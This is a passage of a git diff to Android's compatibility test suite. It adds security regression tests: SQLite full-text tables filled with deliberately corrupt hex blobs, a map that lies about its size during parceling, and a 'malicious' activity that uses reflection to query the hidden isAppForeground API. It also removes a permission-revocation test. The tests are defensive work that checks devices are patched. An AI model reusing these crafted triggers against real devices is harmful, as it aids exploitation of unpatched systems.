+ + "'0005616261636b03010200ffffffff070266740302020003046e646f6e03030200');");
+ mDatabase.setTransactionSuccessful();
+ mDatabase.endTransaction();
+ try {
+ mDatabase.execSQL("SELECT * FROM ft WHERE ft MATCH 'abandon';");
+ } catch (SQLiteDatabaseCorruptException e) {
+ return;
+ }
+ fail("Expecting a SQLiteDatabaseCorruptException");
+ }
+
+ public void testScript2() {
+ mDatabase.beginTransaction();
+ mDatabase.execSQL("CREATE VIRTUAL TABLE ft USING fts3;");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(1,"
+ + "X'0004616263300301020003013103020200040130030b0200040131030c0200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(2,"
+ + "X'00056162633132030d0200040133030e0200040134030f020004013503100200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(3,"
+ + "X'0005616263313603110200040137031202000401380313020004013903140200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(4,"
+ + "X'00046162633203030200030133030402000301340305020003013503060200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(5,"
+ + "X'000461626336030702000301370308020003013803090200030139030a0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir "
+ + "VALUES(0,0,1,5,'5 157',X'0101056162633132ffffffff070236030132030136');");
+ mDatabase.setTransactionSuccessful();
+ mDatabase.endTransaction();
+ try {
+ mDatabase.execSQL("SELECT * FROM ft WHERE ft MATCH 'abc20';");
+ } catch (SQLiteDatabaseCorruptException e) {
+ return;
+ }
+ fail("Expecting a SQLiteDatabaseCorruptException");
+ }
+
+ public void testScript3() {
+ mDatabase.beginTransaction();
+ mDatabase.execSQL("CREATE VIRTUAL TABLE ft USING fts4;");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES"
+ + "(1,X'00046162633003010200040178030202000501780303020003013103040200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES"
+ + "(2,X'00056162633130031f0200ffffffff07ff5566740302020003046e646f6e03030200');");
+ mDatabase.execSQL("INSERT INTO ft_segments VALUES(384,NULL);");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,0,0,0,'0 24',X'000561626331780305020005017803060200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + " (0,1,0,0,'0 24',X'000461626332030702000401780308020005017803090200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,2,0,0,'0 24',X'000461626333030a0200040178030b0200050178030c0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES" +
+ "(0,3,0,0,'0 24',X'000461626334030d0200040178030e0200050178030f0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,4,0,0,'0 24',X'000461626335031002000401780311020005017803120200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,5,0,0,'0 24',X'000461626336031302000401780314020005017803150200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,6,0,0,'0 24',X'000461626337031602000401780317020005017803180200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,7,0,0,'0 24',X'00046162633803190200040178031a0200050178031b0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,8,0,0,'0 24',X'000461626339031c0200040178031d0200050178031e0200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,9,0,0,'0 25',X'00066162633130780320020006017803210200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES"
+ + "(0,10,0,0,'0 25',X'00056162633131032202000501780323020006017803240200');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES(1,0,1,2,'384 -42',X'0101056162633130');");
+ mDatabase.execSQL("INSERT INTO ft_stat VALUES(1,X'000b');");
+ mDatabase.execSQL("PRAGMA writable_schema=OFF;");
+ mDatabase.setTransactionSuccessful();
+ mDatabase.endTransaction();
+ try {
+ mDatabase.execSQL("INSERT INTO ft(ft) VALUES('merge=1,4');");
+ } catch (SQLiteDatabaseCorruptException e) {
+ return;
+ }
+ fail("Expecting a SQLiteDatabaseCorruptException");
+ }
+}
+
+
+
+
+
+
+
+
+
+
+
diff --git a/tests/tests/dpi2/Android.mk b/tests/tests/dpi2/Android.mk
index 8b31db5..f366781 100644
--- a/tests/tests/dpi2/Android.mk
+++ b/tests/tests/dpi2/Android.mk
@@ -31,7 +31,6 @@
LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 3
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/tests/tests/media/libndkaudio/Android.mk b/tests/tests/media/libndkaudio/Android.mk
index 9480dcd..982c630 100644
--- a/tests/tests/media/libndkaudio/Android.mk
+++ b/tests/tests/media/libndkaudio/Android.mk
@@ -57,6 +57,5 @@
LOCAL_CERTIFICATE := platform
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 23
include $(BUILD_STATIC_JAVA_LIBRARY)
diff --git a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/Android.mk b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/Android.mk
index 032bcde..7a11df4 100644
--- a/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/Android.mk
+++ b/tests/tests/networksecurityconfig/networksecurityconfig-cleartext-pre-P/Android.mk
@@ -33,6 +33,4 @@
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 26
-
include $(BUILD_CTS_PACKAGE)
diff --git a/tests/tests/notificationlegacy/Android.mk b/tests/tests/notificationlegacy/Android.mk
index 07b2f80..c1fb3fa 100644
--- a/tests/tests/notificationlegacy/Android.mk
+++ b/tests/tests/notificationlegacy/Android.mk
@@ -39,6 +39,4 @@
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_MIN_SDK_VERSION := 24
-
include $(BUILD_CTS_PACKAGE)
\ No newline at end of file
diff --git a/tests/tests/os/src/android/os/cts/ParcelTest.java b/tests/tests/os/src/android/os/cts/ParcelTest.java
index 7645477..3715850 100644
--- a/tests/tests/os/src/android/os/cts/ParcelTest.java
+++ b/tests/tests/os/src/android/os/cts/ParcelTest.java
@@ -19,7 +19,11 @@
import java.io.FileDescriptor;
import java.io.Serializable;
import java.util.ArrayList;
+import java.util.Collection;
import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+import java.util.Set;
import android.content.pm.Signature;
import android.os.BadParcelableException;
@@ -3250,4 +3254,58 @@
} catch (RuntimeException expected) {
}
}
+
+ public void testMaliciousMapWrite() {
+ class MaliciousMap<K, V> extends HashMap<K, V> {
+ public int fakeSize = 0;
+ public boolean armed = false;
+
+ class FakeEntrySet extends HashSet<Entry<K, V>> {
+ public FakeEntrySet(Collection<? extends Entry<K, V>> c) {
+ super(c);
+ }
+
+ @Override
+ public int size() {
+ if (armed) {
+ // Only return fake size on next call, to mitigate unexpected behavior.
+ armed = false;
+ return fakeSize;
+ } else {
+ return super.size();
+ }
+ }
+ }
+
+ @Override
+ public Set<Map.Entry<K, V>> entrySet() {
+ return new FakeEntrySet(super.entrySet());
+ }
+ }
+
+ Parcel parcel = Parcel.obtain();
+
+ // Fake having more Map entries than there really are
+ MaliciousMap map = new MaliciousMap<String, String>();
+ map.fakeSize = 1;
+ map.armed = true;
+ try {
+ parcel.writeMap(map);
+ fail("Should have thrown a BadParcelableException");
+ } catch (BadParcelableException bpe) {
+ // good
+ }
+
+ // Fake having fewer Map entries than there really are
+ map = new MaliciousMap<String, String>();
+ map.put("key", "value");
+ map.fakeSize = 0;
+ map.armed = true;
+ try {
+ parcel.writeMap(map);
+ fail("Should have thrown a BadParcelableException");
+ } catch (BadParcelableException bpe) {
+ // good
+ }
+ }
}
diff --git a/tests/tests/packageinstaller/emptytestapp/Android.mk b/tests/tests/packageinstaller/emptytestapp/Android.mk
index 4763e01..7574d1f 100644
--- a/tests/tests/packageinstaller/emptytestapp/Android.mk
+++ b/tests/tests/packageinstaller/emptytestapp/Android.mk
@@ -23,7 +23,6 @@
LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 23
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := arcts cts vts general-tests
diff --git a/tests/tests/permission/AndroidTest.xml b/tests/tests/permission/AndroidTest.xml
index f845462..c516a60 100644
--- a/tests/tests/permission/AndroidTest.xml
+++ b/tests/tests/permission/AndroidTest.xml
@@ -33,17 +33,11 @@
<target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
<option name="push" value="CtsAppThatRequestsPermissionAandB.apk->/data/local/tmp/cts/permissions/CtsAppThatRequestsPermissionAandB.apk" />
<option name="push" value="CtsAppThatRequestsPermissionAandC.apk->/data/local/tmp/cts/permissions/CtsAppThatRequestsPermissionAandC.apk" />
- <option name="push" value="CtsAdversarialPermissionUserApp.apk->/data/local/tmp/cts/permissions/CtsAdversarialPermissionUserApp.apk" />
- <option name="push" value="CtsAdversarialPermissionDefinerApp.apk->/data/local/tmp/cts/permissions/CtsAdversarialPermissionDefinerApp.apk" />
- <option name="push" value="CtsVictimPermissionDefinerApp.apk->/data/local/tmp/cts/permissions/CtsVictimPermissionDefinerApp.apk" />
</target_preparer>
<!-- Remove additional apps if installed -->
<target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
<option name="teardown-command" value="pm uninstall android.permission.cts.appthatrequestpermission" />
- <option name="teardown-command" value="pm uninstall android.permission.cts.revokepermissionwhenremoved.AdversarialPermissionDefinerApp" />
- <option name="teardown-command" value="pm uninstall android.permission.cts.revokepermissionwhenremoved.VictimPermissionDefinerApp" />
- <option name="teardown-command" value="pm uninstall android.permission.cts.revokepermissionwhenremoved.userapp" />
</target_preparer>
<test class="com.android.tradefed.testtype.AndroidJUnitTest" >
diff --git a/tests/tests/permission/src/android/permission/cts/RemovePermissionTest.java b/tests/tests/permission/src/android/permission/cts/RemovePermissionTest.java
deleted file mode 100644
index 2cf261a..0000000
--- a/tests/tests/permission/src/android/permission/cts/RemovePermissionTest.java
+++ /dev/null
@@ -1,119 +0,0 @@
-/*
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.permission.cts;
-
-import static android.content.pm.PackageInfo.REQUESTED_PERMISSION_GRANTED;
-import static android.content.pm.PackageManager.GET_PERMISSIONS;
-
-import static org.junit.Assert.assertEquals;
-import static org.junit.Assert.assertFalse;
-import static org.junit.Assert.assertTrue;
-
-import android.app.Instrumentation;
-import android.content.Context;
-import android.content.pm.PackageInfo;
-import android.content.pm.PackageManager;
-import android.platform.test.annotations.SecurityTest;
-import android.support.test.InstrumentationRegistry;
-
-import com.android.compatibility.common.util.SystemUtil;
-
-import org.junit.After;
-import org.junit.Before;
-import org.junit.Test;
-
-public class RemovePermissionTest {
- private static final String APP_PKG_NAME = "android.permission.cts.revokepermissionwhenremoved";
- private static final String USER_PKG_NAME =
- "android.permission.cts.revokepermissionwhenremoved.userapp";
- private static final String VICTIM_PKG_NAME =
- "android.permission.cts.revokepermissionwhenremoved.VictimPermissionDefinerApp";
- private static final String TEST_PERMISSION =
- "android.permission.cts.revokepermissionwhenremoved.TestPermission";
-
- private Context mContext;
- private Instrumentation mInstrumentation;
-
- @Before
- public void setContextAndInstrumentation() {
- mContext = InstrumentationRegistry.getTargetContext();
- mInstrumentation = InstrumentationRegistry.getInstrumentation();
- }
-
- @Before
- public void wakeUpScreen() {
- SystemUtil.runShellCommand("input keyevent KEYCODE_WAKEUP");
- }
-
- @After
- public void cleanUp() throws Exception {
- uninstallApp(USER_PKG_NAME);
- uninstallApp(VICTIM_PKG_NAME);
- uninstallApp(APP_PKG_NAME + ".AdversarialPermissionDefinerApp");
- }
-
- private boolean permissionGranted(String permName) throws PackageManager.NameNotFoundException {
- PackageInfo appInfo = mContext.getPackageManager().getPackageInfo(USER_PKG_NAME,
- GET_PERMISSIONS);
-
- for (int i = 0; i < appInfo.requestedPermissions.length; i++) {
- if (appInfo.requestedPermissions[i].equals(permName)) {
- return ((appInfo.requestedPermissionsFlags[i] & REQUESTED_PERMISSION_GRANTED) != 0);
- }
- }
- return false;
- }
-
- private void installApp(String apk) {
- String installResult = SystemUtil.runShellCommand(
- "pm install -r data/local/tmp/cts/permissions/" + apk + ".apk");
- assertEquals("Success", installResult.trim());
- }
-
- private void uninstallApp(String pkg) {
- uninstallApp(pkg, false);
- }
-
- private void uninstallApp(String pkg, boolean assertSuccess) {
- String uninstallResult = SystemUtil.runShellCommand(
- "pm uninstall " + pkg);
- if (assertSuccess) {
- assertEquals("Success", uninstallResult.trim());
- }
- }
-
- private void grantPermission(String pkg, String permission) {
- mInstrumentation.getUiAutomation().grantRuntimePermission(
- pkg, permission);
- }
-
- @SecurityTest
- @Test
- public void permissionShouldBeRevokedIfRemoved() throws Throwable {
- installApp("CtsAdversarialPermissionDefinerApp");
- installApp("CtsAdversarialPermissionUserApp");
-
- grantPermission(USER_PKG_NAME, TEST_PERMISSION);
- assertTrue(permissionGranted(TEST_PERMISSION));
-
- // Uninstall app which defines a permission with the same name as in victim app.
- // Install the victim app.
- uninstallApp(APP_PKG_NAME + ".AdversarialPermissionDefinerApp", true);
- installApp("CtsVictimPermissionDefinerApp");
- assertFalse(permissionGranted(TEST_PERMISSION));
- }
-}
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/Android.mk b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/Android.mk
deleted file mode 100644
index 0302643..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/Android.mk
+++ /dev/null
@@ -1,31 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-LOCAL_PATH:= $(call my-dir)
-
-include $(CLEAR_VARS)
-
-LOCAL_MODULE_TAGS := tests
-LOCAL_SDK_VERSION := current
-
-LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests cts_instant
-
-LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey1
-LOCAL_PACKAGE_NAME := CtsAdversarialPermissionDefinerApp
-
-
-include $(BUILD_CTS_PACKAGE)
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/AndroidManifest.xml b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/AndroidManifest.xml
deleted file mode 100644
index 20fd73a..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/AndroidManifest.xml
+++ /dev/null
@@ -1,29 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- -->
-
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="android.permission.cts.revokepermissionwhenremoved.AdversarialPermissionDefinerApp">
-
- <permission android:name="android.permission.cts.revokepermissionwhenremoved.TestPermission"
- android:protectionLevel="dangerous"
- android:label="TestPermission"
- android:description="@string/test_permission" />
-
- <application>
- </application>
-</manifest>
-
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/Android.mk b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/Android.mk
deleted file mode 100644
index 70a096e..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/Android.mk
+++ /dev/null
@@ -1,29 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-LOCAL_PATH:= $(call my-dir)
-
-include $(CLEAR_VARS)
-
-LOCAL_MODULE_TAGS := tests
-LOCAL_SDK_VERSION := current
-
-LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests cts_instant
-LOCAL_CERTIFICATE := cts/hostsidetests/appsecurity/certs/cts-testkey2
-LOCAL_PACKAGE_NAME := CtsAdversarialPermissionUserApp
-
-include $(BUILD_CTS_PACKAGE)
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/Android.mk b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/Android.mk
deleted file mode 100644
index 9aaa6ac..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/Android.mk
+++ /dev/null
@@ -1,17 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH:= $(call my-dir)
-
-include $(call all-makefiles-under,$(LOCAL_PATH))
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/AndroidManifest.xml b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/AndroidManifest.xml
deleted file mode 100644
index 72f836d..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/AndroidManifest.xml
+++ /dev/null
@@ -1,29 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- -->
-
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="android.permission.cts.revokepermissionwhenremoved.VictimPermissionDefinerApp">
-
- <permission android:name="android.permission.cts.revokepermissionwhenremoved.TestPermission"
- android:protectionLevel="signature"
- android:label="Test Permission"
- android:description="@string/test_permission" />
-
- <application>
- </application>
-</manifest>
-
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/res/values/strings.xml b/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/res/values/strings.xml
deleted file mode 100644
index 062b41c..0000000
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/VictimPermissionDefinerApp/res/values/strings.xml
+++ /dev/null
@@ -1,19 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!-- Copyright (C) 2018 The Android Open Source Project
-
- Licensed under the Apache License, Version 2.0 (the "License");
- you may not use this file except in compliance with the License.
- You may obtain a copy of the License at
-
- http://www.apache.org/licenses/LICENSE-2.0
-
- Unless required by applicable law or agreed to in writing, software
- distributed under the License is distributed on an "AS IS" BASIS,
- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- See the License for the specific language governing permissions and
- limitations under the License.
--->
-
-<resources xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2">
- <string name="test_permission">Test Permission</string>
-</resources>
diff --git a/tests/tests/provider/Android.mk b/tests/tests/provider/Android.mk
index eb6629b..400f0d2 100644
--- a/tests/tests/provider/Android.mk
+++ b/tests/tests/provider/Android.mk
@@ -48,6 +48,4 @@
LOCAL_PACKAGE_NAME := CtsProviderTestCases
LOCAL_PRIVATE_PLATFORM_APIS := true
-LOCAL_MIN_SDK_VERSION := 21
-
include $(BUILD_CTS_PACKAGE)
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 4da499e..51d48e7 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -50,6 +50,10 @@
<category android:name="android.intent.category.FRAMEWORK_INSTRUMENTATION_TEST"/>
</intent-filter>
</activity>
+
+ <activity android:name="android.security.cts.ActivityManagerTest$NormalActivity" />
+ <activity android:name="android.security.cts.ActivityManagerTest$MaliciousActivity" />
+ <service android:name="android.security.cts.ActivityManagerTest$AppMonitoringService" />
</application>
<instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
diff --git a/tests/tests/security/res/raw/bug_33250932_avc.mp4 b/tests/tests/security/res/raw/bug_33250932_avc.mp4
new file mode 100644
index 0000000..ff6ce03
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33250932_avc.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_36592202.ogg b/tests/tests/security/res/raw/bug_36592202.ogg
old mode 100755
new mode 100644
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_37430213.mp4 b/tests/tests/security/res/raw/bug_37430213.mp4
new file mode 100644
index 0000000..618f620
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_37430213.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_64710074.mp4 b/tests/tests/security/res/raw/bug_64710074.mp4
new file mode 100644
index 0000000..5544ffe
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_64710074.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_70239507.aac b/tests/tests/security/res/raw/bug_70239507.aac
new file mode 100644
index 0000000..9132beb
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_70239507.aac
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_74114680_ts.mp4 b/tests/tests/security/res/raw/bug_74114680_ts.mp4
new file mode 100644
index 0000000..10e20bd
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_74114680_ts.mp4
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
index 5a65d41..7e57319 100644
--- a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
+++ b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
@@ -15,18 +15,50 @@
*/
package android.security.cts;
+import android.annotation.Nullable;
+import android.app.Activity;
+import android.app.ActivityManager;
+import android.app.Service;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.Handler;
import android.os.IBinder;
+import android.os.Process;
import android.platform.test.annotations.SecurityTest;
+import android.support.test.InstrumentationRegistry;
+import android.util.Log;
+import android.view.WindowManager;
+
import junit.framework.TestCase;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.util.concurrent.CountDownLatch;
+import java.util.concurrent.TimeUnit;
+
@SecurityTest
public class ActivityManagerTest extends TestCase {
+ private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
+ private static CountDownLatch sLatch;
+ private static volatile int sNormalActivityUserId;
+ private static volatile boolean sCannotReflect;
+ private static volatile boolean sIsAppForeground;
+
+ private static final String TAG = "ActivityManagerTest";
+
@Override
protected void setUp() throws Exception {
super.setUp();
+
+ sLatch = new CountDownLatch(2);
+ sNormalActivityUserId = -1;
+ sCannotReflect = false;
+ sIsAppForeground = false;
}
+ @SecurityTest(minPatchLevel = "2015-03")
public void testActivityManager_injectInputEvents() throws ClassNotFoundException {
try {
/*
@@ -42,4 +74,117 @@
// Patched devices should throw this exception
}
}
+
+ public void testIsAppInForegroundNormal() throws Exception {
+ /* Verify that isAppForeground can be called by the caller on itself. */
+ launchActivity(NormalActivity.class);
+ sNormalActivityUserId = InstrumentationRegistry.getTargetContext().getPackageManager()
+ .getPackageUid(SECURITY_CTS_PACKAGE_NAME, 0);
+ sLatch.await(5, TimeUnit.SECONDS); // Ensure the service has ran at least twice.
+ if (sCannotReflect) return; // If reflection is not possible, pass the test.
+ assertTrue("isAppForeground failed to query for uid on itself.", sIsAppForeground);
+ }
+
+ public void testIsAppInForegroundMalicious() throws Exception {
+ /* Verify that isAppForeground cannot be called by another app on a known uid. */
+ launchActivity(MaliciousActivity.class);
+ launchSettingsActivity();
+ sLatch.await(5, TimeUnit.SECONDS); // Ensure the service has ran at least twice.
+ if (sCannotReflect) return; // If reflection is not possible, pass the test.
+ assertFalse("isAppForeground successfully queried for a uid other than itself.",
+ sIsAppForeground);
+ }
+
+ private void launchActivity(Class<? extends Activity> clazz) {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(Intent.ACTION_MAIN);
+ intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ private void launchSettingsActivity() {
+ final Context context = InstrumentationRegistry.getInstrumentation().getContext();
+ final Intent intent = new Intent(android.provider.Settings.ACTION_SETTINGS);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+ }
+
+ public static class NormalActivity extends Activity {
+
+ @Override
+ protected void onCreate(@Nullable Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ getWindow().addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON);
+
+ Intent intent = new Intent(this, AppMonitoringService.class);
+ intent.putExtra(AppMonitoringService.EXTRA_UID, sNormalActivityUserId);
+ startService(intent);
+ }
+ }
+
+ public static class MaliciousActivity extends Activity {
+
+ @Override
+ protected void onCreate(@Nullable Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ getWindow().addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON);
+
+ Intent intent = new Intent(this, AppMonitoringService.class);
+ intent.putExtra(AppMonitoringService.EXTRA_UID, Process.SYSTEM_UID);
+ startService(intent);
+ finish();
+ }
+ }
+
+ public static class AppMonitoringService extends Service {
+
+ private static final String EXTRA_UID = "android.security.cts.extra.UID";
+ private int uid;
+
+ @Override
+ public int onStartCommand(Intent intent, int flags, int startId) {
+ uid = intent.getIntExtra(EXTRA_UID, -1);
+ return super.onStartCommand(intent, flags, startId);
+ }
+
+ public AppMonitoringService() {
+ super.onCreate();
+
+ final Handler handler = new Handler();
+ handler.postDelayed(new Runnable() {
+ public void run() {
+ try {
+ ActivityManager activityManager = (ActivityManager) getSystemService(
+ ACTIVITY_SERVICE);
+ Field field = activityManager.getClass().getDeclaredField(
+ "IActivityManagerSingleton");
+ field.setAccessible(true);
+ Object fieldValue = field.get(activityManager);
+ Method method = fieldValue.getClass().getDeclaredMethod("create");
+ method.setAccessible(true);
+ Object IActivityInstance = method.invoke(fieldValue);
+ Method isAppForeground = IActivityInstance.getClass().getDeclaredMethod(
+ "isAppForeground", int.class);
+ isAppForeground.setAccessible(true);
+ boolean res = (boolean) isAppForeground.invoke(IActivityInstance, uid);
+ if (res) {
+ sIsAppForeground = true;
+ }
+ } catch (Exception e) {
+ Log.e(TAG, "Failed to fetch/invoke field/method via reflection.", e);
+ sCannotReflect = true;
+ }
+ sLatch.countDown();
+ handler.postDelayed(this, 200);
+
+ }
+ }, 0);
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ throw new UnsupportedOperationException("Not yet implemented");
+ }
+ }
}
\ No newline at end of file
diff --git a/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java b/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java
index f8a2a8f..df1018a 100644
--- a/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java
+++ b/tests/tests/security/src/android/security/cts/AllocatePixelRefIntOverflowTest.java
@@ -32,6 +32,7 @@
* Verifies that the device is not vulnerable to ANDROID-19270126: Android
* BitmapFactory.decodeStream JPG allocPixelRef integer overflow
*/
+ @SecurityTest(minPatchLevel = "2015-03")
